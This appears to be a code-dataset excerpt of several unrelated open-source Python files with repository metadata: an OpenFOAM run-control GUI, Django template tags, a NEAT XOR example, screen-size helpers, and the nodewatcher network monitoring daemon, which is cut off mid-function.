if IsPrime(posPrime2):
if num % posPrime2 == 0:
num = num/posPrime2
largestFactor = posPrime2
done = checkIfDone(num)
iterator += 1
return largestFactor
print findLargestPrimeFactor(600851475143)
|
mit
| 4,260,531,782,545,222,700
| 19.803922
| 42
| 0.504496
| false
| 3.915493
| false
| false
| false
|
jmarcelogimenez/petroSym
|
petroSym/run.py
|
1
|
11910
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 25 13:08:19 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
from run_ui import Ui_runUI
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
from reset import *
from time import localtime, strftime, struct_time
from logTab import *
from ExampleThread import *
from utils import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class runUI(QtGui.QScrollArea, Ui_runUI):
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
QtGui.QScrollArea.__init__(self, parent)
self.setupUi(self)
class runWidget(runUI):
def __init__(self, currentFolder, solvername):
runUI.__init__(self)
self.solvername = solvername
self.currentFolder = currentFolder
def setCurrentFolder(self, currentFolder, solvername):
self.currentFolder = currentFolder
self.solvername = solvername
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
#Si abro la gui y hay un caso corriendo, desabilito estos botones
if (self.window().runningpid!= -1):
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
if self.window().nproc<=1:
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
else:
self.type_serial.setChecked(False)
self.type_parallel.setChecked(True)
self.num_proc.setValue(self.window().nproc)
self.pushButton_decompose.setEnabled(False)
self.changeType()
def runCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
# if self.window().nproc>1:
# w = QtGui.QMessageBox(QtGui.QMessageBox.Information, "Is the case decomposed?", "Simulation will be done only if case decompositione was done previously. Continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
# ret = w.exec_()
# if(QtGui.QMessageBox.No == ret):
# return
#modifico el control dict porque pude haber parado la simulacion
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['stopAt'] = 'endTime'
parsedData.writeFile()
self.window().removeFilesPostPro()
#retraso un minuto la edicion del control dict
tt = list(localtime())
tt[4] = (tt[4]-1)%60 #Agrego el modulo porque cuando el min es 0, 0-1 = -1
command = 'touch -d "%s" %s'%(strftime("%Y-%m-%d %H:%M:%S", struct_time(tuple(tt))),filename)
os.system(command)
filename1 = '%s/run.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Run',filename1)
if self.window().nproc<=1:
command = '%s -case %s 1> %s 2> %s &'%(self.solvername,self.currentFolder,filename1,filename2)
else:
command = 'mpirun -np %s %s -case %s -parallel 1> %s 2> %s & '%(str(self.window().nproc),self.solvername,self.currentFolder,filename1, filename2)
os.system(command)
if self.window().nproc<=1:
command = 'pidof %s'%self.solvername
else:
command = 'pidof mpirun'
import subprocess
self.window().runningpid = subprocess.check_output(command, shell=True)
self.window().runningpid.replace('\n','') #Me lo devuelve con un espacio al final
self.window().runningpid = int(self.window().runningpid) #Y como string
self.window().save_config()
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
self.window().tab_mesh.setEnabled(False)
self.window().refresh_pushButton.setEnabled(False)
leave = [1,5]
for i in range(self.window().treeWidget.topLevelItemCount()):
if i not in leave:
self.window().treeWidget.topLevelItem(i).setDisabled(True)
self.window().findChild(logTab,'%s/run.log'%self.currentFolder).findChild(QtGui.QPushButton,'pushButton_3').setEnabled(True)
self.window().updateLogFiles()
def changeType(self):
nprocOld = self.window().nproc
if self.type_serial.isChecked():
self.num_proc.setEnabled(False)
if nprocOld==1:
self.pushButton_decompose.setText('Apply')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/save16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
else:
self.pushButton_decompose.setText('Apply and Reconstruct Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/reconstruct16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
self.pushButton_reconstruct.setText("Reconstuct Case (use under your responsability)")
self.pushButton_decompose.setEnabled(True)
else:
self.num_proc.setEnabled(True)
self.pushButton_decompose.setText('Apply and Decompose Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/decompose16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
self.pushButton_reconstruct.setText("Reconstuct Case (use under your responsability)")
self.pushButton_decompose.setEnabled(True)
def resetCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
w = reset()
result = w.exec_()
if result:
self.window().nproc = 1
command = 'pyFoamClearCase.py %s %s'%(w.getParams(), self.currentFolder)
os.system(command)
#if w.deleteSnapshots():
# command = 'rm -rf %s/postProcessing/snapshots'%self.currentFolder
# os.system(command)
if w.resetFigures():
self.window().resetFigures(w.deletePostpro(),True)
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['startFrom'] = 'startTime'
parsedData['startTime'] = '0'
parsedData.writeFile()
self.window().typeFile = {}
self.window().pending_files = []
self.window().pending_dirs = []
self.window().updateLogFiles()
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
self.changeType()
self.window().save_config()
def decomposeCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
nprocOld = self.window().nproc
if self.type_serial.isChecked():
if nprocOld>1:
self.reconstructCase()
self.window().nproc = 1
else:
if nprocOld == self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "Case already decomposed.")
return
if nprocOld>1 and nprocOld != self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "The case must be reconstructed before decompose with other number of processors.")
return
self.window().nproc = self.num_proc.value()
#Si el tiempo es cero debo filtrar algunos campos
if self.currtime=='0':
#modifico el diccionario
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
#voy a descomponer solo los campos que estoy utilizando en el solver, el resto los dejo intactos
command = 'mv %s %s.bak'%(self.timedir,self.timedir)
os.system(command)
command = 'mkdir %s'%(self.timedir)
os.system(command)
for ifield in self.fields:
command = 'cp %s.bak/%s %s/.'%(self.timedir,ifield,self.timedir)
os.system(command)
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
command = 'rm -r %s'%(self.timedir)
os.system(command)
command = 'mv %s.bak %s'%(self.timedir,self.timedir)
os.system(command)
else:
#Si la corrida ya ha avanzado, hay que descomponer todo
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
self.window().save_config()
w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Decompose Case","The case has been succesfully decomposed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
def reconstructCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
if int(self.currtime)==0:
QtGui.QMessageBox.about(self, "ERROR", "Time step 0 already exists")
return
else:
filename1 = '%s/reconstruct.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Reconstruct',filename1)
command = 'reconstructPar -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Reconstruct Case","The case has been succesfully reconstructed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
|
gpl-2.0
| 8,266,735,191,862,843,000
| 43.610487
| 222
| 0.594207
| false
| 4.007402
| false
| false
| false
|
palankai/xadrpy
|
src/xadrpy/core/templates/base.py
|
1
|
3454
|
from django import template
from django.utils.encoding import smart_str
import re
from django.template.base import FilterExpression, NodeList
from django.template.loader import get_template
kwarg_re = re.compile( r"(?:(\w+)=)?(.+)" )
class WidgetLibrary(template.Library):
def widget_tag_compile_function(self, cls, widget_name):
def widget_tag(parser, token):
"""
{% xwidget 'valami nev' %}
{% xwidget 'valami nev' as valtozo %}
{% xwidget 'valami nev' with 'template.html' as valtozo %}
{% xwidget 'valami nev' with variable as valtozo %}
{% xwidget 'valami nev' with-inline as valtozo %}...{% endxwidget %}
{% xwidget 'valami nev' with-inline %}...{% endxwidget %}
"""
bits = token.split_contents()
#widget_name = parser.compile_filter(bits[1])
args = []
kwargs = {}
asvar = None
templ = None
bits = bits[1:]
if len( bits ) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len( bits ) >=1 and bits[-1] == 'with-inline':
templ = True
bits = bits[:-1]
elif len( bits ) >=2 and bits[-2] == 'with':
templ = bits[-1]
bits = bits[:-2]
if len( bits ):
for bit in bits:
match = kwarg_re.match( bit )
if not match:
raise template.TemplateSyntaxError( "Malformed arguments to widget tag" )
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter( value )
else:
args.append( parser.compile_filter( value ) )
if templ == True:
templ = parser.parse(('end'+widget_name,))
parser.delete_first_token()
elif templ:
templ = parser.compile_filter( templ )
return cls(args, kwargs, templ, asvar)
return widget_tag
def widget(self, name):
def inner(cls):
self.tag(name, self.widget_tag_compile_function(cls, name))
return inner
class XWidgetBase(template.Node):
def __init__(self, args, kwargs, template, asvar):
self.args = args
self.kwargs = kwargs
self.template = template
self.asvar = asvar
def render(self, context):
def resolve(v, context):
if unicode(v)==u"False": return False
elif unicode(v)==u"True": return True
elif unicode(v)==u"None": return None
else:
return v.resolve(context)
args = [arg.resolve( context ) for arg in self.args]
kwargs = dict( [( smart_str( k, 'ascii' ), resolve(v, context) ) for k, v in self.kwargs.items()] )
if isinstance(self.template, FilterExpression):
kwargs['TEMPLATE']=get_template(self.template.resolve( context ))
if isinstance(self.template, NodeList):
kwargs['TEMPLATE']=self.template
if not self.asvar:
return self.value(context, *args, **kwargs)
context[self.asvar]=self.value(context, *args, **kwargs)
return ""
def value(self, context, *args, **kwargs):
return ""
|
lgpl-3.0
| -5,177,239,194,537,481,000
| 37.808989
| 107
| 0.516503
| false
| 4.176542
| false
| false
| false
|
machinebrains/neat-python
|
examples/xor/xor2.py
|
1
|
1861
|
""" 2-input XOR example """
from __future__ import print_function
from neatsociety import nn, population, statistics, visualize
# Network inputs and expected outputs.
xor_inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
xor_outputs = [0, 1, 1, 0]
def eval_fitness(genomes):
for g in genomes:
net = nn.create_feed_forward_phenotype(g)
sum_square_error = 0.0
for inputs, expected in zip(xor_inputs, xor_outputs):
# Serial activation propagates the inputs through the entire network.
output = net.serial_activate(inputs)
sum_square_error += (output[0] - expected) ** 2
# When the output matches expected for all inputs, fitness will reach
# its maximum value of 1.0.
g.fitness = 1 - sum_square_error
pop = population.Population('xor2_config')
pop.run(eval_fitness, 300)
print('Number of evaluations: {0}'.format(pop.total_evaluations))
# Display the most fit genome.
winner = pop.statistics.best_genome()
print('\nBest genome:\n{!s}'.format(winner))
# Verify network output against training data.
print('\nOutput:')
winner_net = nn.create_feed_forward_phenotype(winner)
for inputs, expected in zip(xor_inputs, xor_outputs):
output = winner_net.serial_activate(inputs)
print("expected {0:1.5f} got {1:1.5f}".format(expected, output[0]))
# Visualize the winner network and plot/log statistics.
visualize.plot_stats(pop.statistics)
visualize.plot_species(pop.statistics)
visualize.draw_net(winner, view=True, filename="xor2-all.gv")
visualize.draw_net(winner, view=True, filename="xor2-enabled.gv", show_disabled=False)
visualize.draw_net(winner, view=True, filename="xor2-enabled-pruned.gv", show_disabled=False, prune_unused=True)
statistics.save_stats(pop.statistics)
statistics.save_species_count(pop.statistics)
statistics.save_species_fitness(pop.statistics)
|
bsd-3-clause
| -3,919,349,984,448,292,400
| 35.490196
| 112
| 0.709833
| false
| 3.259194
| false
| false
| false
|
SmileyChris/django-navtag
|
django_navtag/templatetags/navtag.py
|
1
|
5170
|
from django import template
from django.utils.encoding import smart_str
from django.utils.safestring import mark_safe
register = template.Library()
class Nav(object):
def __init__(self, tree=None, root=None):
self._root = root or self
self._tree = tree or {}
def __getitem__(self, key):
return Nav(self._tree[key], root=self._root)
def __str__(self):
return mark_safe(str(self._text))
def __bool__(self):
return bool(self._tree)
def _get_text(self):
if hasattr(self._root, "_text_value"):
return self._root._text_value
return self._tree
def _set_text(self, value):
self._root._text_value = value
_text = property(_get_text, _set_text)
def clear(self):
self._tree = {}
def update(self, *args, **kwargs):
self._tree.update(*args, **kwargs)
class NavNode(template.Node):
def __init__(self, item=None, var_for=None, var_text=None):
self.item = item
self.var_name = var_for or "nav"
self.text = var_text
def render(self, context):
first_context_stack = context.dicts[0]
nav = first_context_stack.get(self.var_name)
if nav is not context.get(self.var_name):
raise template.TemplateSyntaxError(
"'{0}' variable has been altered in current context".format(
self.var_name
)
)
if not isinstance(nav, Nav):
nav = Nav()
# Copy the stack to avoid leaking into other contexts.
new_first_context_stack = first_context_stack.copy()
new_first_context_stack[self.var_name] = nav
context.dicts[0] = new_first_context_stack
if self.text:
nav._text = self.text.resolve(context)
return ""
# If self.item was blank then there's nothing else to do here.
if not self.item:
return ""
if nav:
# If the nav variable is already set, don't do anything.
return ""
item = self.item.resolve(context)
item = item and smart_str(item)
value = True
if not item:
item = ""
for part in reversed(item.split(".")):
new_item = {}
new_item[part] = value
value = new_item
nav.clear()
nav.update(new_item)
return ""
def __repr__(self):
return "<Nav node>"
@register.tag
def nav(parser, token):
"""
Handles navigation item selection.
Example usage::
{# Set the context so {{ nav.home }} (or {{ mynav.home }}) is True #}
{% nav "home" %} or {% nav "home" for mynav %}
The most basic (and common) use of the tag is to call ``{% nav [item] %}``,
where ``[item]`` is the item you want to check is selected.
By default, this tag creates a ``nav`` context variable. To use an
alternate context variable name, call ``{% nav [item] for [var_name] %}``.
Your HTML navigation template should look something like::
{% block nav %}
<ul class="nav">
<li{% if nav.home %} class="selected"{% endif %}>
<a href="/">Home</a>
</li>
<li{% if nav.about %} class="selected"{% endif %}>
<a href="/about/">About</a>
</li>
</ul>
{% endblock %}
To override this in a child template, you'd do::
{% include "base.html" %}
{% load nav %}
{% block nav %}
{% nav "about" %}
{{ block.super }}
{% endblock %}
This works for multiple levels of template inheritance, due to the fact
that the tag only does anything if the ``nav`` context variable does not
exist. So only the first ``{% nav %}`` call found will ever be processed.
As a shortcut, you can use a ``text`` argument and then just reference the
variable rather than query it with an ``{% if %}`` tag::
{% nav text ' class="active"' %}
<ul class="nav">
<li{{ nav.home }}><a href="/">Home</a></li>
<li{{ nav.about }}><a href="/about/">About</a></li>
</ul>
To create a sub-menu you can check against, simply dot-separate the item::
{% nav "about_menu.info" %}
This will be pass for both ``{% if nav.about_menu %}`` and
``{% if nav.about_menu.info %}``.
"""
bits = token.split_contents()
ok = True
keys = {"for": False, "text": True}
node_kwargs = {}
while len(bits) > 2:
value = bits.pop()
key = bits.pop()
if key not in keys:
ok = False
break
compile_filter = keys.pop(key)
if compile_filter:
value = parser.compile_filter(value)
node_kwargs["var_{0}".format(key)] = value
if len(bits) > 1:
# Text argument doesn't expect an item.
ok = "text" not in node_kwargs
item = parser.compile_filter(bits[1])
else:
item = None
if not ok:
raise template.TemplateSyntaxError("Unexpected format for %s tag" % bits[0])
return NavNode(item, **node_kwargs)
|
mit
| 2,733,805,172,510,658,000
| 28.20904
| 84
| 0.544874
| false
| 3.904834
| false
| false
| false
|
ponty/pyscreenshot
|
tests/size.py
|
1
|
1350
|
import os
from easyprocess import EasyProcess
from pyscreenshot.util import platform_is_linux, platform_is_osx, platform_is_win
def display_size_x():
# http://www.cyberciti.biz/faq/how-do-i-find-out-screen-resolution-of-my-linux-desktop/
# xdpyinfo | grep 'dimensions:'
screen_width, screen_height = 0, 0
if not os.environ.get("DISPLAY"):
raise ValueError("missing DISPLAY variable")
xdpyinfo = EasyProcess("xdpyinfo")
xdpyinfo.enable_stdout_log = False
if xdpyinfo.call().return_code != 0:
raise ValueError("xdpyinfo error: %s" % xdpyinfo)
for x in xdpyinfo.stdout.splitlines():
if "dimensions:" in x:
screen_width, screen_height = map(int, x.strip().split()[1].split("x"))
return screen_width, screen_height
def display_size_osx():
from Quartz import CGDisplayBounds
from Quartz import CGMainDisplayID
mainMonitor = CGDisplayBounds(CGMainDisplayID())
return int(mainMonitor.size.width), int(mainMonitor.size.height)
def display_size_win():
from win32api import GetSystemMetrics
return int(GetSystemMetrics(0)), int(GetSystemMetrics(1))
def display_size():
if platform_is_osx():
return display_size_osx()
if platform_is_win():
return display_size_win()
if platform_is_linux():
return display_size_x()
|
bsd-2-clause
| 3,261,601,400,750,375,400
| 27.723404
| 91
| 0.684444
| false
| 3.443878
| false
| false
| false
|
galaxor/Nodewatcher
|
nodewatcher/monitor/monitor.py
|
1
|
45662
|
#!/usr/bin/python
#
# nodewatcher monitoring daemon
#
# Copyright (C) 2009 by Jernej Kos <kostko@unimatrix-one.org>
#
# First parse options (this must be done here since they contain import paths
# that must be parsed before Django models can be imported)
import sys, os
from optparse import OptionParser
print "============================================================================"
print " nodewatcher monitoring daemon "
print "============================================================================"
parser = OptionParser()
parser.add_option('--path', dest = 'path', help = 'Path that contains nodewatcher "web" Python module')
parser.add_option('--settings', dest = 'settings', help = 'Django settings to use')
parser.add_option('--olsr-host', dest = 'olsr_host', help = 'A host with OLSR txt-info plugin running (overrides settings file)')
parser.add_option('--stress-test', dest = 'stress_test', help = 'Perform a stress test (only used for development)', action = 'store_true')
parser.add_option('--collect-simulation', dest = 'collect_sim', help = 'Collect simulation data', action = 'store_true')
parser.add_option('--update-rrds', dest = 'update_rrds', help = 'Update RRDs', action = 'store_true')
parser.add_option('--update-rrd-type', dest = 'update_rrd_type', help = 'Update RRD type (refresh, archive, switch_sources)', default = 'refresh')
parser.add_option('--update-rrd-opts', dest = 'update_rrd_opts', help = 'Update RRD options', default = '')
parser.add_option('--reverse-populate', dest = 'reverse_populate', help = 'Reverse populate RRD with data from a database', action = 'store_true')
parser.add_option('--reverse-populate-node', dest = 'rp_node', help = 'Node to populate data for')
parser.add_option('--reverse-populate-graph', dest = 'rp_graph', help = 'Graph type to populate data for')
options, args = parser.parse_args()
if not options.path:
print "ERROR: Path specification is required!\n"
parser.print_help()
exit(1)
elif not options.settings:
print "ERROR: Settings specification is required!\n"
parser.print_help()
exit(1)
elif options.reverse_populate and (not options.rp_node or not options.rp_graph):
print "ERROR: Reverse populate requires node and graph type!\n"
parser.print_help()
exit(1)
# Setup import paths, since we are using Django models
sys.path.append(options.path)
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
# Import our models
from web.nodes.models import Node, NodeStatus, Subnet, SubnetStatus, APClient, Link, GraphType, GraphItem, Event, EventSource, EventCode, IfaceType, InstalledPackage, NodeType, RenumberNotice, WarningCode, NodeWarning, Tweet
from web.generator.models import Template, Profile
from web.nodes import data_archive
from django.db import transaction, models, connection
from django.conf import settings
# Possibly override MONITOR_OLSR_HOST setting with comomand line option
if options.olsr_host:
settings.MONITOR_OLSR_HOST = options.olsr_host
# Import other stuff
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None) or options.stress_test:
from simulator import nodewatcher, wifi_utils
else:
from lib import nodewatcher, wifi_utils
# Setup simulation data collection
nodewatcher.COLLECT_SIMULATION_DATA = options.collect_sim
wifi_utils.COLLECT_SIMULATION_DATA = options.collect_sim
from web.monitor.rrd import *
from web.monitor import graphs
from lib.topology import DotTopologyPlotter
from lib import ipcalc
from time import sleep
from datetime import datetime, timedelta
from traceback import format_exc, print_exc
import pwd
import logging
import time
import multiprocessing
import gc
import struct
if Tweet.tweets_enabled():
from lib import bitly
WORKER_POOL = None
def safe_int_convert(integer):
"""
A helper method for converting a string to an integer.
"""
try:
return int(integer)
except:
return None
def safe_float_convert(value, precision = 3):
"""
A helper method for converting a string to a float.
"""
try:
return round(float(value), precision)
except:
return None
def safe_loadavg_convert(loadavg):
"""
A helper method for converting a string to a loadavg tuple.
"""
try:
loadavg = loadavg.split(' ')
la1min, la5min, la15min = (float(x) for x in loadavg[0:3])
nproc = int(loadavg[3].split('/')[1])
return la1min, la5min, la15min, nproc
except:
return None, None, None, None
def safe_uptime_convert(uptime):
"""
A helper method for converting a string to an uptime integer.
"""
try:
return int(float(uptime.split(' ')[0]))
except:
return None
def safe_date_convert(timestamp):
"""
A helper method for converting a string timestamp into a datetime
object.
"""
try:
return datetime.fromtimestamp(int(timestamp))
except:
return None
def safe_dbm_convert(dbm):
"""
A helper method for converting a string into a valid dBm integer
value. This also takes care of unsigned/signed char conversions.
"""
try:
dbm = safe_int_convert(dbm)
if dbm is None:
return None
if dbm > 127:
# Convert from unsigned char into signed one
dbm = struct.unpack("b", struct.pack("<i", dbm)[0])[0]
return dbm
except:
return None
@transaction.commit_on_success
def check_events():
"""
Check events that need resend.
"""
transaction.set_dirty()
Event.post_events_that_need_resend()
@transaction.commit_on_success
def check_global_statistics():
"""
Graph some global statistics.
"""
transaction.set_dirty()
# Nodes by status
nbs = {}
for s in Node.objects.exclude(node_type = NodeType.Test).values('status').annotate(count = models.Count('ip')):
nbs[s['status']] = s['count']
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
RRA.update(None, RRANodesByStatus, rra,
nbs.get(NodeStatus.Up, 0),
nbs.get(NodeStatus.Down, 0),
nbs.get(NodeStatus.Visible, 0),
nbs.get(NodeStatus.Invalid, 0),
nbs.get(NodeStatus.Pending, 0),
nbs.get(NodeStatus.Duped, 0),
graph = -2
)
# Global client count
client_count = len(APClient.objects.all())
rra = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.update(None, RRAGlobalClients, rra, client_count, graph = -3)
def update_rrd(item):
"""
Updates a single RRD.
"""
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', item.rra))
conf = graphs.RRA_CONF_MAP[item.type]
# Update the RRD
RRA.convert(conf, archive, action = options.update_rrd_type, opts = options.update_rrd_opts, graph = item.pk)
def update_rrds():
"""
Updates RRDs.
"""
# We must close the database connection before we fork the worker pool, otherwise
# resources will be shared and problems will arise!
connection.close()
pool = multiprocessing.Pool(processes = settings.MONITOR_GRAPH_WORKERS)
try:
pool.map(update_rrd, GraphItem.objects.all()[:])
# Don't forget the global graphs
rra_status = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_nodes_by_status.rrd')
rra_clients = os.path.join(settings.MONITOR_WORKDIR, 'rra', 'global_client_count.rrd')
RRA.convert(RRANodesByStatus, rra_status, action = options.update_rrd_type, graph = -2)
RRA.convert(RRAGlobalClients, rra_clients, action = options.update_rrd_type, graph = -3)
except:
logging.warning(format_exc())
pool.close()
pool.join()
@transaction.commit_on_success
def check_dead_graphs():
"""
Checks for dead graphs.
"""
GraphItem.objects.filter(dead = False, last_update__lt = datetime.now() - timedelta(minutes = 10)).update(
dead = True,
need_redraw = True
)
# Remove RRDs that need removal
for graph in GraphItem.objects.filter(need_removal = True):
try:
os.unlink(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
except:
pass
GraphItem.objects.filter(need_removal = True).delete()
def generate_new_node_tweet(node):
"""
Generates a tweet when a new node connects to the network.
"""
if not Tweet.tweets_enabled():
return
try:
bit_api = bitly.Api(login=settings.BITLY_LOGIN, apikey=settings.BITLY_API_KEY)
node_link = bit_api.shorten(node.get_full_url())
msg = "A new node %s has just connected to the network %s" % (node.name, node_link)
Tweet.post_tweet(node, msg)
except:
logging.warning("%s/%s: %s" % (node.name, node.ip, format_exc()))
@transaction.commit_on_success
def process_node(node_ip, ping_results, is_duped, peers, varsize_results):
"""
Processes a single node.
@param node_ip: Node's IP address
@param ping_results: Results obtained from ICMP ECHO tests
@param is_duped: True if duplicate echos received
@param peers: Peering info from routing daemon
@param varsize_results: Results of ICMP ECHO tests with variable payloads
"""
transaction.set_dirty()
try:
n = Node.get_exclusive(ip = node_ip)
except Node.DoesNotExist:
# This might happen when we were in the middle of a renumbering and
# did not yet have access to the node. Then after the node has been
# renumbered we gain access, but the IP has been changed. In this
# case we must ignore processing of this node.
return
grapher = graphs.Grapher(n)
oldStatus = n.status
old_last_seen = n.last_seen
# Determine node status
if ping_results is not None:
n.status = NodeStatus.Up
n.rtt_min, n.rtt_avg, n.rtt_max, n.pkt_loss = ping_results
# Add RTT graph
grapher.add_graph(GraphType.RTT, 'Latency', 'latency', n.rtt_avg, n.rtt_min, n.rtt_max)
# Add uptime credit
if n.uptime_last:
n.uptime_so_far = (n.uptime_so_far or 0) + (datetime.now() - n.uptime_last).seconds
n.uptime_last = datetime.now()
else:
n.status = NodeStatus.Visible
# Measure packet loss with different packet sizes and generate a graph
if ping_results is not None and varsize_results is not None:
losses = [n.pkt_loss] + varsize_results
grapher.add_graph(GraphType.PacketLoss, 'Packet Loss', 'packetloss', *losses)
if is_duped:
n.status = NodeStatus.Duped
NodeWarning.create(n, WarningCode.DupedReplies, EventSource.Monitor)
# Generate status change events
if oldStatus in (NodeStatus.Down, NodeStatus.Pending, NodeStatus.New) and n.status in (NodeStatus.Up, NodeStatus.Visible):
if oldStatus in (NodeStatus.New, NodeStatus.Pending):
n.first_seen = datetime.now()
if n.node_type == NodeType.Wireless:
generate_new_node_tweet(n)
Event.create_event(n, EventCode.NodeUp, '', EventSource.Monitor)
elif oldStatus != NodeStatus.Duped and n.status == NodeStatus.Duped:
Event.create_event(n, EventCode.PacketDuplication, '', EventSource.Monitor)
# Add olsr peer count graph
grapher.add_graph(GraphType.OlsrPeers, 'Routing Peers', 'olsrpeers', n.peers)
# Add LQ/ILQ/ETX graphs
if n.peers > 0:
etx_avg = lq_avg = ilq_avg = 0.0
for peer in n.get_peers():
lq_avg += float(peer.lq)
ilq_avg += float(peer.ilq)
etx_avg += float(peer.etx)
lq_graph = grapher.add_graph(GraphType.LQ, 'Average Link Quality', 'lq', ilq_avg / n.peers, lq_avg / n.peers)
etx_graph = grapher.add_graph(GraphType.ETX, 'Average ETX', 'etx', etx_avg / n.peers)
for peer in n.get_peers():
# Link quality
grapher.add_graph(
GraphType.LQ,
'Link Quality to {0}'.format(peer.dst),
'lq_peer_{0}'.format(peer.dst.pk),
peer.ilq,
peer.lq,
name = peer.dst.ip,
parent = lq_graph
)
# ETX
grapher.add_graph(
GraphType.ETX,
'ETX to {0}'.format(peer.dst),
'etx_peer_{0}'.format(peer.dst.pk),
peer.etx,
name = peer.dst.ip,
parent = etx_graph
)
n.last_seen = datetime.now()
# Attempt to fetch data from nodewatcher
info = nodewatcher.fetch_node_info(node_ip)
# XXX This is an ugly hack for server-type nodes, but it will be fixed by modularization
# rewrite anyway, so no need to make it nice
if n.node_type == NodeType.Server and info is not None and 'iface' in info:
try:
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
grapher.add_graph(
GraphType.Traffic,
'Traffic - {0}'.format(iid),
'traffic_{0}'.format(iid),
iface['up'],
iface['down'],
name = iid
)
except:
pass
info = None
# Check if we have fetched nodewatcher data
if info is not None and 'general' in info:
try:
oldUptime = n.uptime or 0
oldChannel = n.channel or 0
oldVersion = n.firmware_version
n.firmware_version = info['general']['version']
n.local_time = safe_date_convert(info['general']['local_time'])
n.bssid = info['wifi']['bssid']
n.essid = info['wifi']['essid']
n.channel = nodewatcher.frequency_to_channel(info['wifi']['frequency'])
n.clients = 0
n.uptime = safe_uptime_convert(info['general']['uptime'])
# Treat missing firmware version file as NULL version
if n.firmware_version == "missing":
n.firmware_version = None
# Validate BSSID and ESSID
if n.bssid != "02:CA:FF:EE:BA:BE":
NodeWarning.create(n, WarningCode.BSSIDMismatch, EventSource.Monitor)
try:
if n.essid != n.configured_essid:
NodeWarning.create(n, WarningCode.ESSIDMismatch, EventSource.Monitor)
except Project.DoesNotExist:
pass
if 'uuid' in info['general']:
n.reported_uuid = info['general']['uuid']
if n.reported_uuid and n.reported_uuid != n.uuid:
NodeWarning.create(n, WarningCode.MismatchedUuid, EventSource.Monitor)
if oldVersion != n.firmware_version:
Event.create_event(n, EventCode.VersionChange, '', EventSource.Monitor, data = 'Old version: %s\n New version: %s' % (oldVersion, n.firmware_version))
if oldUptime > n.uptime:
Event.create_event(n, EventCode.UptimeReset, '', EventSource.Monitor, data = 'Old uptime: %s\n New uptime: %s' % (oldUptime, n.uptime))
# Setup reboot mode for further graphs as we now know the node has
# been rebooted
grapher.enable_reboot_mode(n.uptime, old_last_seen)
if oldChannel != n.channel and oldChannel != 0:
